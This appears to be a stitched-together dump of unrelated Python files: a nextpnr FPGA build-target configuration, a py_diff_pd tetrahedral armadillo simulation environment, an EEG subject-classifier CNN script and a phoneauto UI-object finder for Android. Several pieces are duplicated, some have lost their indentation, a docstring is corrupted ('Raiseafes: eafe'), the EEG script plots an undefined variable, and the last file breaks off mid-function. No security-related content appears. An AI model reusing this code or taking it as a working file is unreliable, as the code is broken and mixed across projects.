Target(name='prjoxide-bba', sources=['nextpnr'], dependencies=['prjoxide'],
       gitrev=[('nextpnr', 'nexus')], build_native=True)
# -- nextpnr itself ---------------------------------------------------------

SourceLocation(name='nextpnr', vcs='git',
               location='https://github.com/YosysHQ/nextpnr',
               revision='origin/master')

# Native build-time tool that compiles .bba chip databases.
Target(name='nextpnr-bba', sources=['nextpnr'], build_native=True,
       gitrev=[('nextpnr', 'bba')])


def _nextpnr_target(name, extra_deps=(), extra_sources=(), **kwargs):
    # Every nextpnr architecture target shares the python3 runtime
    # dependency, the bba tool dependency, and the nextpnr license file;
    # only the arch-specific deps/sources/package differ.
    Target(name=name,
           sources=['nextpnr'] + list(extra_sources),
           dependencies=['python3', 'nextpnr-bba'] + list(extra_deps),
           resources=['python3'],
           license_file='nextpnr/COPYING',
           **kwargs)


_nextpnr_target('nextpnr-generic')
_nextpnr_target('nextpnr-ice40', extra_deps=['icestorm-bba'], package='ice40')
_nextpnr_target('nextpnr-ecp5', extra_deps=['prjtrellis-bba'], package='ecp5')
# machxo2 uses the same prjtrellis base, hence the 'ecp5' package.
_nextpnr_target('nextpnr-machxo2', extra_deps=['prjtrellis-bba'], package='ecp5')
_nextpnr_target('nextpnr-nexus', extra_deps=['prjoxide-bba'], package='nexus')
_nextpnr_target('nextpnr-mistral', extra_sources=['mistral'])

# -- architecture-specific bitstream projects -------------------------------

for _proj, _url in (
        ('icestorm', 'https://github.com/YosysHQ/icestorm'),
        ('prjtrellis', 'https://github.com/YosysHQ/prjtrellis'),
        ('prjoxide', 'https://github.com/gatecat/prjoxide'),
        ('mistral', 'https://github.com/Ravenslofty/mistral')):
    SourceLocation(name=_proj, vcs='git', location=_url,
                   revision='origin/master')

for _proj, _pkg in (('icestorm', 'ice40'),
                    ('prjtrellis', 'ecp5'),
                    ('prjoxide', 'nexus')):
    Target(name=_proj, sources=[_proj],
           license_file=_proj + '/COPYING', package=_pkg)

# -- chip databases (.bba), built natively ----------------------------------

Target(name='icestorm-bba', sources=['nextpnr'], dependencies=['icestorm'],
       gitrev=[('nextpnr', 'ice40')], build_native=True)
Target(name='prjtrellis-bba', sources=['prjtrellis', 'nextpnr'],
       gitrev=[('nextpnr', 'ecp5'), ('nextpnr', 'machxo2')],
       build_native=True)
Target(name='prjoxide-bba', sources=['nextpnr'], dependencies=['prjoxide'],
       gitrev=[('nextpnr', 'nexus')], build_native=True)
import time
from pathlib import Path
import numpy as np
import os
from py_diff_pd.env.env_base import EnvBase
from py_diff_pd.common.tet_mesh import tetrahedralize
from py_diff_pd.common.project_path import root_path
from py_diff_pd.common.common import print_info, create_folder, ndarray
from py_diff_pd.common.display import export_mp4
from py_diff_pd.common.tet_mesh import generate_tet_mesh, read_tetgen_file
from py_diff_pd.common.tet_mesh import get_contact_vertex as get_tet_contact_vertex
from py_diff_pd.core.py_diff_pd_core import TetMesh3d, TetDeformable
from py_diff_pd.common.renderer import PbrtRenderer
from py_diff_pd.common.project_path import root_path
class ArmadilloEnv3d(EnvBase):
    """Differentiable-simulation environment for a tetrahedral armadillo.

    Loads the armadillo tet mesh, reorients/rescales it, clamps the lowest
    vertices fully and the highest vertices in z via Dirichlet conditions,
    applies gravity, and twists the initial configuration about z.
    """

    def __init__(self, seed, folder, options):
        EnvBase.__init__(self, folder)

        np.random.seed(seed)
        create_folder(folder, exist_ok=True)

        # Material/configuration options (with defaults).
        youngs_modulus = options['youngs_modulus'] if 'youngs_modulus' in options else 1e6
        poissons_ratio = options['poissons_ratio'] if 'poissons_ratio' in options else 0.45
        state_force_parameters = options['state_force_parameters'] if 'state_force_parameters' in options else ndarray([0.0, 0.0, -9.81])
        density = 1e3

        # Load the armadillo tetrahedral mesh.
        ele_file_name = Path(root_path) / 'asset' / 'mesh' / 'armadillo_10k.ele'
        node_file_name = Path(root_path) / 'asset' / 'mesh' / 'armadillo_10k.node'
        verts, eles = read_tetgen_file(node_file_name, ele_file_name)

        # Make the mesh consistent with our coordinate system:
        # rotate +90 degrees about x, then 180 degrees about z,
        # shift so min_z = 0, and divide by 1000 (mm -> m, presumably).
        R = ndarray([
            [1, 0, 0],
            [0, 0, -1],
            [0, 1, 0]
        ])
        verts = verts @ R.T
        R = ndarray([
            [-1, 0, 0],
            [0, -1, 0],
            [0, 0, 1],
        ])
        verts = verts @ R.T
        min_z = np.min(verts, axis=0)[2]
        verts[:, 2] -= min_z
        verts /= 1000

        # Build the deformable body via a temporary binary mesh file.
        tmp_bin_file_name = '.tmp.bin'
        generate_tet_mesh(verts, eles, tmp_bin_file_name)
        mesh = TetMesh3d()
        mesh.Initialize(str(tmp_bin_file_name))
        deformable = TetDeformable()
        # str() applied consistently (the original mixed str/plain paths).
        deformable.Initialize(str(tmp_bin_file_name), density, 'neohookean',
                              youngs_modulus, poissons_ratio)
        os.remove(tmp_bin_file_name)

        # Boundary conditions: clamp bottom vertices fully, top vertices in
        # z only; also record the min-x/max-x vertex index sets.
        vert_num = mesh.NumOfVertices()
        all_verts = ndarray([ndarray(mesh.py_vertex(i)) for i in range(vert_num)])
        max_corner = np.max(all_verts, axis=0)
        min_corner = np.min(all_verts, axis=0)
        center = (max_corner + min_corner) / 2
        min_z = min_corner[2]
        max_z = max_corner[2]
        min_x = min_corner[0]
        max_x = max_corner[0]
        dirichlet_dofs = []
        self.__min_x_nodes = []
        self.__max_x_nodes = []
        for i in range(vert_num):
            vx, vy, vz = all_verts[i]
            if vx - min_x < 1e-3:
                self.__min_x_nodes.append(i)
            if max_x - vx < 1e-3:
                self.__max_x_nodes.append(i)
            if vz - min_z < 1e-3:
                # Bottom: fix all three coordinates.
                deformable.SetDirichletBoundaryCondition(3 * i, vx)
                deformable.SetDirichletBoundaryCondition(3 * i + 1, vy)
                deformable.SetDirichletBoundaryCondition(3 * i + 2, vz)
                dirichlet_dofs += [3 * i, 3 * i + 1, 3 * i + 2]
            if max_z - vz < 1e-3:
                # Top: fix z only.
                deformable.SetDirichletBoundaryCondition(3 * i + 2, vz)
                dirichlet_dofs += [3 * i + 2,]
        self.__dirichlet_dofs = dirichlet_dofs

        # State-based forces.
        deformable.AddStateForce('gravity', state_force_parameters)

        # Initial state: twist the armadillo about z, linearly in height,
        # by up to init_rotate_angle radians. Defaults to 0 (no twist);
        # previously a missing key raised KeyError unlike every other option.
        theta = float(options['init_rotate_angle']) if 'init_rotate_angle' in options else 0.0
        q0 = np.copy(all_verts)
        for i in range(vert_num):
            vi = all_verts[i]
            th = (vi[2] - min_z) / (max_corner[2] - min_z) * theta
            c, s = np.cos(th), np.sin(th)
            R = ndarray([[c, -s, 0],
                         [s, c, 0],
                         [0, 0, 1]])
            q0[i] = R @ (vi - center) + center

        dofs = deformable.dofs()
        q0 = q0.ravel()
        v0 = ndarray(np.zeros(dofs)).ravel()
        f_ext = ndarray(np.zeros(dofs)).ravel()

        # Data members consumed by EnvBase and the loss below.
        self._deformable = deformable
        self._q0 = q0
        self._v0 = v0
        self._f_ext = f_ext
        self._youngs_modulus = youngs_modulus
        self._poissons_ratio = poissons_ratio
        self._state_force_parameters = state_force_parameters
        self._stepwise_loss = False
        self.__loss_q_grad = np.random.normal(size=dofs)
        self.__loss_v_grad = np.random.normal(size=dofs)
        self.__spp = options['spp'] if 'spp' in options else 4

    def material_stiffness_differential(self, youngs_modulus, poissons_ratio):
        # This (0, 2) shape is due to the usage of Neohookean materials.
        return np.zeros((0, 2))

    def is_dirichlet_dof(self, dof):
        # Linear scan over the recorded dof list; fine at these sizes.
        return dof in self.__dirichlet_dofs

    def _display_mesh(self, mesh_file, file_name):
        """Render `mesh_file` to the image `file_name` via PBRT."""
        # Size of the bounding box: [-0.06, -0.05, 0] - [0.06, 0.05, 0.14]
        options = {
            'file_name': file_name,
            'light_map': 'uffizi-large.exr',
            'sample': self.__spp,
            'max_depth': 2,
            'camera_pos': (0.12, -0.8, 0.34),
            'camera_lookat': (0, 0, .15)
        }
        renderer = PbrtRenderer(options)

        mesh = TetMesh3d()
        mesh.Initialize(mesh_file)
        renderer.add_tri_mesh(mesh, color='0096c7',
                              transforms=[('s', 2)],
                              render_tet_edge=True,
                              )
        renderer.add_tri_mesh(Path(root_path) / 'asset/mesh/curved_ground.obj',
                              texture_img='chkbd_24_0.7', transforms=[('s', 2)])
        renderer.render()

    def min_x_nodes(self):
        # Vertex indices on the min-x face of the bounding box.
        return self.__min_x_nodes

    def max_x_nodes(self):
        # Vertex indices on the max-x face of the bounding box.
        return self.__max_x_nodes

    def _loss_and_grad(self, q, v):
        # Random linear loss in (q, v); gradients are the fixed random
        # vectors drawn in __init__.
        loss = q.dot(self.__loss_q_grad) + v.dot(self.__loss_v_grad)
        return loss, np.copy(self.__loss_q_grad), np.copy(self.__loss_v_grad)
from pathlib import Path
import numpy as np
import os
from py_diff_pd.env.env_base import EnvBase
from py_diff_pd.common.tet_mesh import tetrahedralize
from py_diff_pd.common.project_path import root_path
from py_diff_pd.common.common import print_info, create_folder, ndarray
from py_diff_pd.common.display import export_mp4
from py_diff_pd.common.tet_mesh import generate_tet_mesh, read_tetgen_file
from py_diff_pd.common.tet_mesh import get_contact_vertex as get_tet_contact_vertex
from py_diff_pd.core.py_diff_pd_core import TetMesh3d, TetDeformable
from py_diff_pd.common.renderer import PbrtRenderer
from py_diff_pd.common.project_path import root_path
class ArmadilloEnv3d(EnvBase):
    """Differentiable-simulation environment for a tetrahedral armadillo.

    Loads the armadillo tet mesh, reorients/rescales it, clamps the lowest
    vertices fully and the highest vertices in z via Dirichlet conditions,
    applies gravity, and twists the initial configuration about z.
    """

    def __init__(self, seed, folder, options):
        EnvBase.__init__(self, folder)

        np.random.seed(seed)
        create_folder(folder, exist_ok=True)

        # Material/configuration options (with defaults).
        youngs_modulus = options['youngs_modulus'] if 'youngs_modulus' in options else 1e6
        poissons_ratio = options['poissons_ratio'] if 'poissons_ratio' in options else 0.45
        state_force_parameters = options['state_force_parameters'] if 'state_force_parameters' in options else ndarray([0.0, 0.0, -9.81])
        density = 1e3

        # Load the armadillo tetrahedral mesh.
        ele_file_name = Path(root_path) / 'asset' / 'mesh' / 'armadillo_10k.ele'
        node_file_name = Path(root_path) / 'asset' / 'mesh' / 'armadillo_10k.node'
        verts, eles = read_tetgen_file(node_file_name, ele_file_name)

        # Make the mesh consistent with our coordinate system:
        # rotate +90 degrees about x, then 180 degrees about z,
        # shift so min_z = 0, and divide by 1000 (mm -> m, presumably).
        R = ndarray([
            [1, 0, 0],
            [0, 0, -1],
            [0, 1, 0]
        ])
        verts = verts @ R.T
        R = ndarray([
            [-1, 0, 0],
            [0, -1, 0],
            [0, 0, 1],
        ])
        verts = verts @ R.T
        min_z = np.min(verts, axis=0)[2]
        verts[:, 2] -= min_z
        verts /= 1000

        # Build the deformable body via a temporary binary mesh file.
        tmp_bin_file_name = '.tmp.bin'
        generate_tet_mesh(verts, eles, tmp_bin_file_name)
        mesh = TetMesh3d()
        mesh.Initialize(str(tmp_bin_file_name))
        deformable = TetDeformable()
        # str() applied consistently (the original mixed str/plain paths).
        deformable.Initialize(str(tmp_bin_file_name), density, 'neohookean',
                              youngs_modulus, poissons_ratio)
        os.remove(tmp_bin_file_name)

        # Boundary conditions: clamp bottom vertices fully, top vertices in
        # z only; also record the min-x/max-x vertex index sets.
        vert_num = mesh.NumOfVertices()
        all_verts = ndarray([ndarray(mesh.py_vertex(i)) for i in range(vert_num)])
        max_corner = np.max(all_verts, axis=0)
        min_corner = np.min(all_verts, axis=0)
        center = (max_corner + min_corner) / 2
        min_z = min_corner[2]
        max_z = max_corner[2]
        min_x = min_corner[0]
        max_x = max_corner[0]
        dirichlet_dofs = []
        self.__min_x_nodes = []
        self.__max_x_nodes = []
        for i in range(vert_num):
            vx, vy, vz = all_verts[i]
            if vx - min_x < 1e-3:
                self.__min_x_nodes.append(i)
            if max_x - vx < 1e-3:
                self.__max_x_nodes.append(i)
            if vz - min_z < 1e-3:
                # Bottom: fix all three coordinates.
                deformable.SetDirichletBoundaryCondition(3 * i, vx)
                deformable.SetDirichletBoundaryCondition(3 * i + 1, vy)
                deformable.SetDirichletBoundaryCondition(3 * i + 2, vz)
                dirichlet_dofs += [3 * i, 3 * i + 1, 3 * i + 2]
            if max_z - vz < 1e-3:
                # Top: fix z only.
                deformable.SetDirichletBoundaryCondition(3 * i + 2, vz)
                dirichlet_dofs += [3 * i + 2,]
        self.__dirichlet_dofs = dirichlet_dofs

        # State-based forces.
        deformable.AddStateForce('gravity', state_force_parameters)

        # Initial state: twist the armadillo about z, linearly in height,
        # by up to init_rotate_angle radians. Defaults to 0 (no twist);
        # previously a missing key raised KeyError unlike every other option.
        theta = float(options['init_rotate_angle']) if 'init_rotate_angle' in options else 0.0
        q0 = np.copy(all_verts)
        for i in range(vert_num):
            vi = all_verts[i]
            th = (vi[2] - min_z) / (max_corner[2] - min_z) * theta
            c, s = np.cos(th), np.sin(th)
            R = ndarray([[c, -s, 0],
                         [s, c, 0],
                         [0, 0, 1]])
            q0[i] = R @ (vi - center) + center

        dofs = deformable.dofs()
        q0 = q0.ravel()
        v0 = ndarray(np.zeros(dofs)).ravel()
        f_ext = ndarray(np.zeros(dofs)).ravel()

        # Data members consumed by EnvBase and the loss below.
        self._deformable = deformable
        self._q0 = q0
        self._v0 = v0
        self._f_ext = f_ext
        self._youngs_modulus = youngs_modulus
        self._poissons_ratio = poissons_ratio
        self._state_force_parameters = state_force_parameters
        self._stepwise_loss = False
        self.__loss_q_grad = np.random.normal(size=dofs)
        self.__loss_v_grad = np.random.normal(size=dofs)
        self.__spp = options['spp'] if 'spp' in options else 4

    def material_stiffness_differential(self, youngs_modulus, poissons_ratio):
        # This (0, 2) shape is due to the usage of Neohookean materials.
        return np.zeros((0, 2))

    def is_dirichlet_dof(self, dof):
        # Linear scan over the recorded dof list; fine at these sizes.
        return dof in self.__dirichlet_dofs

    def _display_mesh(self, mesh_file, file_name):
        """Render `mesh_file` to the image `file_name` via PBRT."""
        # Size of the bounding box: [-0.06, -0.05, 0] - [0.06, 0.05, 0.14]
        options = {
            'file_name': file_name,
            'light_map': 'uffizi-large.exr',
            'sample': self.__spp,
            'max_depth': 2,
            'camera_pos': (0.12, -0.8, 0.34),
            'camera_lookat': (0, 0, .15)
        }
        renderer = PbrtRenderer(options)

        mesh = TetMesh3d()
        mesh.Initialize(mesh_file)
        renderer.add_tri_mesh(mesh, color='0096c7',
                              transforms=[('s', 2)],
                              render_tet_edge=True,
                              )
        renderer.add_tri_mesh(Path(root_path) / 'asset/mesh/curved_ground.obj',
                              texture_img='chkbd_24_0.7', transforms=[('s', 2)])
        renderer.render()

    def min_x_nodes(self):
        # Vertex indices on the min-x face of the bounding box.
        return self.__min_x_nodes

    def max_x_nodes(self):
        # Vertex indices on the max-x face of the bounding box.
        return self.__max_x_nodes

    def _loss_and_grad(self, q, v):
        # Random linear loss in (q, v); gradients are the fixed random
        # vectors drawn in __init__.
        loss = q.dot(self.__loss_q_grad) + v.dot(self.__loss_v_grad)
        return loss, np.copy(self.__loss_q_grad), np.copy(self.__loss_v_grad)
import numpy as np
import torch
import torch.nn as nn
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import Data_prep_12
# Run on the first GPU when available, otherwise CPU.
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')

# Hyper Parameters
num_epochs = 1           # training epochs (appears unused in this script)
learning_rate = 0.00001  # optimizer learning rate (appears unused here)
dropout_level = 0.0      # dropout probability (the CNN hard-codes 0.0)
wdecay = 0.04            # weight decay (appears unused here)
batch_size = 5           # evaluation mini-batch size
num_subjects = 9         # number of subject classes the CNN predicts
class EEG_CNN_Subject(nn.Module):
    """1-D CNN that predicts which subject an EEG trial came from.

    Five conv -> batch-norm -> PReLU -> dropout stages followed by a linear
    classifier. Input is a (batch, 2, T) float tensor; the hard-coded
    flattened feature size (2816 = 256 * 11) requires T such that the final
    conv output has length 11 (e.g. T = 1432).
    """

    def __init__(self, dropout=0.0, num_classes=9):
        # Defaults reproduce the original hard-coded values: dropout 0.0
        # and num_classes matching the module-level num_subjects (9).
        super().__init__()

        def conv_stage(c_in, c_out, kernel, stride):
            # Shared building block; module order (Conv1d, BatchNorm1d,
            # PReLU, Dropout) keeps state_dict keys identical to the
            # original layerN.0/layerN.1 layout, so pretrained
            # checkpoints still load.
            return nn.Sequential(
                nn.Conv1d(c_in, c_out, kernel_size=kernel, stride=stride, bias=False),
                nn.BatchNorm1d(num_features=c_out),
                nn.PReLU(),
                nn.Dropout(dropout))

        self.layer1 = conv_stage(2, 16, 20, 4)
        self.layer2 = conv_stage(16, 32, 10, 2)
        self.layer3 = conv_stage(32, 64, 5, 2)
        self.layer4 = conv_stage(64, 128, 3, 2)
        self.layer5 = conv_stage(128, 256, 2, 4)
        self.classifier = nn.Linear(2816, num_classes)

    def forward(self, x):
        """Return raw class logits of shape (batch, num_classes)."""
        out = self.layer1(x)
        out = self.layer2(out)
        out = self.layer3(out)
        out = self.layer4(out)
        out = self.layer5(out)
        out = out.view(out.size(0), -1)
        return self.classifier(out)
# Load the pretrained subject classifier onto the selected device.
# The checkpoint stores the model weights under the 'state_dict' key.
subject_predictor = EEG_CNN_Subject().to(device)
state = torch.load("pretrain_subject.cpt")
subject_predictor.load_state_dict(state['state_dict'])
def sub_invariant(data_fake, label_fake):
train_input = torch.from_numpy(data_fake)
train_label = torch.from_numpy(label_fake)
# create the data loader for the training set
trainset = torch.utils.data.TensorDataset(train_input, train_label)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=False, num_workers=4)
mean_outputs = []
subject_predictor.eval()
with torch.no_grad():
for i, data in enumerate(trainloader, 0):
# format the data from the dataloader
inputs, labels = data
inputs, labels = inputs.to(device), labels.to(device)
inputs = inputs.float()
outputs = subject_predictor(inputs)
outputs = torch.softmax(outputs, dim=1)
outputs = outputs.detach().cpu().numpy()
mean_outputs.append(outputs)
mean_outputs = np.asarray(mean_outputs)
mean_outputs = np.concatenate(mean_outputs)
mean_outputs = np.mean(mean_outputs, 0)
return mean_outputs
data_SISGAN = np.load('SISGAN_CT.npy')
label_SISGAN = np.load('SISGAN_CT_labels.npy')
label_SISGAN = label_SISGAN.astype(np.int64)
data_ACGAN = np.load('ACGAN_CT.npy')
label_ACGAN = np.load('ACGAN_CT_labels.npy')
label_ACGAN = label_ACGAN.astype(np.int64)
mean_SISGAN = sub_invariant(data_SISGAN, label_SISGAN)
mean_ACGAN = sub_invariant(data_ACGAN, label_ACGAN)
X = np.arange(9)
plt.bar(X + 0.05, mean_ACGAN, color='tab:blue', width = 0.4)
plt.bar(X + 0.45, mean_SIACGAN, color='tab:green', width = 0.4)
plt.rc('xtick',labelsize=14)
plt.rc('ytick',labelsize=14)
plt.xlabel('Subject' , fontsize=15)
plt.ylabel('Probability', fontsize=15)
plt.xticks(X + 0.50 / 2, ('S01', 'S02', 'S03', 'S04', 'S05', 'S06', 'S07', 'S08', 'S09'))
plt.legend(handles = [mpatches.Patch(color='tab:blue', label='AC-GAN'), mpatches.Patch(color='tab:green', label='SIS-GAN')], fontsize=15)
plt.savefig('softmax.pdf') | src/CNN_Subject_softmax.py | import numpy as np
import torch
import torch.nn as nn
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import Data_prep_12
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
# Hyper Parameters
num_epochs = 1
learning_rate = 0.00001
dropout_level = 0.0
wdecay = 0.04
batch_size = 5
num_subjects = 9
class EEG_CNN_Subject(nn.Module):
def __init__(self):
super().__init__()
self.layer1 = nn.Sequential(
nn.Conv1d(in_channels=2, out_channels=16, kernel_size=20, stride=4, bias=False),
nn.BatchNorm1d(num_features=16),
nn.PReLU(),
nn.Dropout(0.0))
self.layer2 = nn.Sequential(
nn.Conv1d(in_channels=16, out_channels=32, kernel_size=10, stride=2, bias=False),
nn.BatchNorm1d(num_features=32),
nn.PReLU(),
nn.Dropout(0.0))
self.layer3 = nn.Sequential(
nn.Conv1d(in_channels=32, out_channels=64, kernel_size=5, stride=2, bias=False),
nn.BatchNorm1d(num_features=64),
nn.PReLU(),
nn.Dropout(0.0))
self.layer4 = nn.Sequential(
nn.Conv1d(in_channels=64, out_channels=128, kernel_size=3, stride=2, bias=False),
nn.BatchNorm1d(num_features=128),
nn.PReLU(),
nn.Dropout(0.0))
self.layer5 = nn.Sequential(
nn.Conv1d(in_channels=128, out_channels=256, kernel_size=2, stride=4, bias=False),
nn.BatchNorm1d(num_features=256),
nn.PReLU(),
nn.Dropout(0.0))
self.classifier = nn.Linear(2816, num_subjects)
def forward(self, x):
out = self.layer1(x)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = self.layer5(out)
out = out.view(out.size(0), -1)
out = self.classifier(out)
return out
subject_predictor = EEG_CNN_Subject().to(device)
state = torch.load("pretrain_subject.cpt")
subject_predictor.load_state_dict(state['state_dict'])
def sub_invariant(data_fake, label_fake):
train_input = torch.from_numpy(data_fake)
train_label = torch.from_numpy(label_fake)
# create the data loader for the training set
trainset = torch.utils.data.TensorDataset(train_input, train_label)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=False, num_workers=4)
mean_outputs = []
subject_predictor.eval()
with torch.no_grad():
for i, data in enumerate(trainloader, 0):
# format the data from the dataloader
inputs, labels = data
inputs, labels = inputs.to(device), labels.to(device)
inputs = inputs.float()
outputs = subject_predictor(inputs)
outputs = torch.softmax(outputs, dim=1)
outputs = outputs.detach().cpu().numpy()
mean_outputs.append(outputs)
mean_outputs = np.asarray(mean_outputs)
mean_outputs = np.concatenate(mean_outputs)
mean_outputs = np.mean(mean_outputs, 0)
return mean_outputs
data_SISGAN = np.load('SISGAN_CT.npy')
label_SISGAN = np.load('SISGAN_CT_labels.npy')
label_SISGAN = label_SISGAN.astype(np.int64)
data_ACGAN = np.load('ACGAN_CT.npy')
label_ACGAN = np.load('ACGAN_CT_labels.npy')
label_ACGAN = label_ACGAN.astype(np.int64)
mean_SISGAN = sub_invariant(data_SISGAN, label_SISGAN)
mean_ACGAN = sub_invariant(data_ACGAN, label_ACGAN)
X = np.arange(9)
plt.bar(X + 0.05, mean_ACGAN, color='tab:blue', width = 0.4)
plt.bar(X + 0.45, mean_SIACGAN, color='tab:green', width = 0.4)
plt.rc('xtick',labelsize=14)
plt.rc('ytick',labelsize=14)
plt.xlabel('Subject' , fontsize=15)
plt.ylabel('Probability', fontsize=15)
plt.xticks(X + 0.50 / 2, ('S01', 'S02', 'S03', 'S04', 'S05', 'S06', 'S07', 'S08', 'S09'))
plt.legend(handles = [mpatches.Patch(color='tab:blue', label='AC-GAN'), mpatches.Patch(color='tab:green', label='SIS-GAN')], fontsize=15)
plt.savefig('softmax.pdf') | 0.919611 | 0.487429 |
from __future__ import unicode_literals
import math
import sys
from phoneauto.scriptgenerator.exception import UiObjectNotFound
class UiObjectLocator(object):
"""Locator for locating a UI object on the screen"""
def __init__(self, filters, index=None):
"""Initialize locator object
Args:
filters (dict): Key-value pairs which are used as filter conditions
to filter out UI Objects.
index (int): Index in a list which is yielded by applying
filters. It is used to identify the UI object.
When filters are enough to filter out UI objects to one single
object, index is not used and can be None.
"""
self._filters = filters
self._index = index
self._meta = None
def set_meta(self, meta):
"""Set meta information"""
self._meta = meta
@property
def meta(self):
"""Meta information aquired on search"""
return self._meta
@property
def filters(self):
"""Filter conditions which is used to identify a UI object"""
return self._filters
@property
def index(self):
"""Index in filter results, which is used to identify a UI object"""
return self._index
class UiObjectFinder(object):
"""Finder to spot a UI object for provided conditions"""
_FIND_OBJECT_DISTANCE_THRESH = 200
def __init__(self, hierarchy_dump):
"""Initialize finder object
Args:
hierarchy_dump (object): UI hierarchy dump object
"""
self._hierarchy_dump = hierarchy_dump
def find_object_contains(self, coord, ignore_distant, **criteria):
"""Find an object of which rect contains given coordinates
and meeds given criteria.
Args:
coord (tuple): Coordinates (x, y)
ignore_distant (bool):
Boolean flag which specifies whether it ignores
UI objects of which center are too far from coord.
criteria (dict):
Optional key-value pairs which filter search result
Returns:
locator object
Raiseafes:
eafe UiObjectNotFound: If there is no such object corresponds to
f given coordinates and criteria.
"""
# Find all objects which contain (x, y)
objects_iter = self._find_objects_contains(
coord, ignore_distant, **criteria)
# Pick an object which has smallest area
smallest = self._select_smallest_object(objects_iter)
if smallest is None:
raise UiObjectNotFound('({0}, {1})'.format(*coord))
# Try finding filters which can uniquely identify an object
locator = self._determine_locator(smallest['object'])
# If failed, Use index in addition to filters
locator = locator or UiObjectLocator(
filters=criteria, index=smallest['index'])
locator.set_meta(smallest['object'])
return locator
def _find_objects_contains(self, coord, ignore_distant, **criteria):
"""Find UI object of which rect contains coord"""
# pylint: disable=invalid-name
T, L, B, R = 'top', 'left', 'bottom', 'right'
x, y = coord
def xy_in_rect(r):
"""Check xy is in rect r"""
if x < r[L] or r[R] <= x or y < r[T] or r[B] <= y:
return False
if ignore_distant:
r_x, r_y = r[L] + (r[R] - r[L]) / 2, r[T] + (r[B] - r[T]) / 2
distance = math.hypot(x - r_x, y - r_y)
return distance < self._FIND_OBJECT_DISTANCE_THRESH
return True
objects = self._hierarchy_dump.find_objects(**criteria)
for i, obj in enumerate(objects):
if xy_in_rect(obj['visibleBounds']):
yield (i, obj)
@staticmethod
def _select_smallest_object(object_enum):
"""Select the smallest UI object from a set of UI objects"""
def rect_area(rect):
"""Returns area of rect"""
return ((rect['bottom'] - rect['top']) *
(rect['right'] - rect['left']))
min_obj = sentinel = (sys.maxsize, )
for i, obj in object_enum:
area = rect_area(obj['visibleBounds'])
if area < min_obj[0]:
min_obj = (area, i, obj)
if min_obj is sentinel:
return None
return {'index': min_obj[1], 'object': min_obj[2]}
def _determine_locator(self, info):
"""Determine locator which identifies one single UI object"""
def unique(**criteria):
"""Check if given criteria finds single UI object"""
objects = list(self._hierarchy_dump.find_objects(**criteria))
return len(objects) == 1
# uses resource_id if it's available and unique
resource_id = info['resourceName']
if resource_id and unique(resourceId=resource_id):
return UiObjectLocator(filters={'resourceId': resource_id})
# uses content-desc if it's available
content_desc = info['contentDescription']
if content_desc and unique(description=content_desc):
return UiObjectLocator(filters={'description': content_desc})
# uses text if it's available
if info['text'] and unique(text=info['text']):
return UiObjectLocator(filters={'text': info['text']})
# uses text if it's available
class_name = info['className']
if class_name and unique(className=class_name):
return UiObjectLocator(filters={'className': class_name})
return None | phoneauto/scriptgenerator/uiobjectfinder.py | from __future__ import unicode_literals
import math
import sys
from phoneauto.scriptgenerator.exception import UiObjectNotFound
class UiObjectLocator(object):
"""Locator for locating a UI object on the screen"""
def __init__(self, filters, index=None):
"""Initialize locator object
Args:
filters (dict): Key-value pairs which are used as filter conditions
to filter out UI Objects.
index (int): Index in a list which is yielded by applying
filters. It is used to identify the UI object.
When filters are enough to filter out UI objects to one single
object, index is not used and can be None.
"""
self._filters = filters
self._index = index
self._meta = None
def set_meta(self, meta):
"""Set meta information"""
self._meta = meta
@property
def meta(self):
"""Meta information aquired on search"""
return self._meta
@property
def filters(self):
"""Filter conditions which is used to identify a UI object"""
return self._filters
@property
def index(self):
"""Index in filter results, which is used to identify a UI object"""
return self._index
class UiObjectFinder(object):
"""Finder to spot a UI object for provided conditions"""
_FIND_OBJECT_DISTANCE_THRESH = 200
def __init__(self, hierarchy_dump):
"""Initialize finder object
Args:
hierarchy_dump (object): UI hierarchy dump object
"""
self._hierarchy_dump = hierarchy_dump
def find_object_contains(self, coord, ignore_distant, **criteria):
"""Find an object of which rect contains given coordinates
and meeds given criteria.
Args:
coord (tuple): Coordinates (x, y)
ignore_distant (bool):
Boolean flag which specifies whether it ignores
UI objects of which center are too far from coord.
criteria (dict):
Optional key-value pairs which filter search result
Returns:
locator object
Raiseafes:
eafe UiObjectNotFound: If there is no such object corresponds to
f given coordinates and criteria.
"""
# Find all objects which contain (x, y)
objects_iter = self._find_objects_contains(
coord, ignore_distant, **criteria)
# Pick an object which has smallest area
smallest = self._select_smallest_object(objects_iter)
if smallest is None:
raise UiObjectNotFound('({0}, {1})'.format(*coord))
# Try finding filters which can uniquely identify an object
locator = self._determine_locator(smallest['object'])
# If failed, Use index in addition to filters
locator = locator or UiObjectLocator(
filters=criteria, index=smallest['index'])
locator.set_meta(smallest['object'])
return locator
def _find_objects_contains(self, coord, ignore_distant, **criteria):
"""Find UI object of which rect contains coord"""
# pylint: disable=invalid-name
T, L, B, R = 'top', 'left', 'bottom', 'right'
x, y = coord
def xy_in_rect(r):
"""Check xy is in rect r"""
if x < r[L] or r[R] <= x or y < r[T] or r[B] <= y:
return False
if ignore_distant:
r_x, r_y = r[L] + (r[R] - r[L]) / 2, r[T] + (r[B] - r[T]) / 2
distance = math.hypot(x - r_x, y - r_y)
return distance < self._FIND_OBJECT_DISTANCE_THRESH
return True
objects = self._hierarchy_dump.find_objects(**criteria)
for i, obj in enumerate(objects):
if xy_in_rect(obj['visibleBounds']):
yield (i, obj)
@staticmethod
def _select_smallest_object(object_enum):
"""Select the smallest UI object from a set of UI objects"""
def rect_area(rect):
"""Returns area of rect"""
return ((rect['bottom'] - rect['top']) *
(rect['right'] - rect['left']))
min_obj = sentinel = (sys.maxsize, )
for i, obj in object_enum:
area = rect_area(obj['visibleBounds'])
if area < min_obj[0]:
min_obj = (area, i, obj)
if min_obj is sentinel:
return None
return {'index': min_obj[1], 'object': min_obj[2]}
def _determine_locator(self, info):
"""Determine locator which identifies one single UI object"""
def unique(**criteria):
"""Check if given criteria finds single UI object"""
objects = list(self._hierarchy_dump.find_objects(**criteria))
return len(objects) == 1
# uses resource_id if it's available and unique
resource_id = info['resourceName']
if resource_id and unique(resourceId=resource_id):
